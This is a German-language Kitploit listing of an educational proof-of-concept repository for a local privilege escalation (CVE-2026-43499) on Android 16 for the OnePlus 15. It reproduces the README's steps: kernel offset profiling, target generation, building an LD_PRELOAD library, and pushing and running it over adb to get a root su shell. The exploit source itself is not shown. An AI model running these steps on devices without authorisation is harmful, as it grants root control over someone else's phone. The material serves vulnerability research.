Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-43499-OnePlus15 — Lehrreicher Proof-of-Concept für lokale Privilege Escalation unter Android 16 auf OnePlus 15, mit Kernel-Offset-Erkennung, Zielgenerierung und LD_PRELOAD-basiertem Exploit-Build. | Kitploit
Tools/GitHubGitHub/bartixxx32/cve-2026-43499-oneplus15
Android-SicherheitPrivilege EscalationExploitationMobile SicherheitLernen & BildungPayload-EntwicklungBinary-Exploitation
GitHubbartixxx32/cve-2026-43499-oneplus15

CVE-2026-43499-OnePlus15

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Lehrreicher Proof-of-Concept für lokale Privilege Escalation unter Android 16 auf OnePlus 15, mit Kernel-Offset-Erkennung, Zielgenerierung und LD_PRELOAD-basiertem Exploit-Build.

Repository anzeigen
635vor 1 MonatNoch nicht geprüft

CVE-2026-43499 — OnePlus 15 LPE (Lehrreicher PoC)

WARNUNG: Dieses Repository wird nur für Bildungs- und Forschungszwecke bereitgestellt. Es werden keine vorgefertigten Binärdateien oder Releases verteilt. Sie müssen alles aus dem Quellcode erstellen.

Android 16 lokale Privilegienausweitung für OnePlus 15.

Fork von x-spy/CVE-2026-43499-popsicle mit einem kallsyms-Ausrichtungsfix und einem verifizierten OnePlus-15-Profil.

Profil

Das Profil enthält zwei physische Adressen, die von einem gerooteten Gerät mit derselben Firmware bestätigt werden müssen:

root@kitploit:~
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}

Auto-Erkennung mit einem gerooteten Gerät:

root@kitploit:~
python3 detect_offset.py

Ziel generieren

Erfordert Python 3 und llvm-objdump:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --profile profile_oneplus15.json \
  -o source/src/target.h

Erstellen

root@kitploit:~
make -C source clean preload

Falls NDK nicht automatisch erkannt wird:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

Ausgabe: source/build/bin/preload.so

Ausführen

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id

Danksagungen

  • x-spy für den ursprünglichen Exploit und die CVE-Entdeckung
Tool herunterladen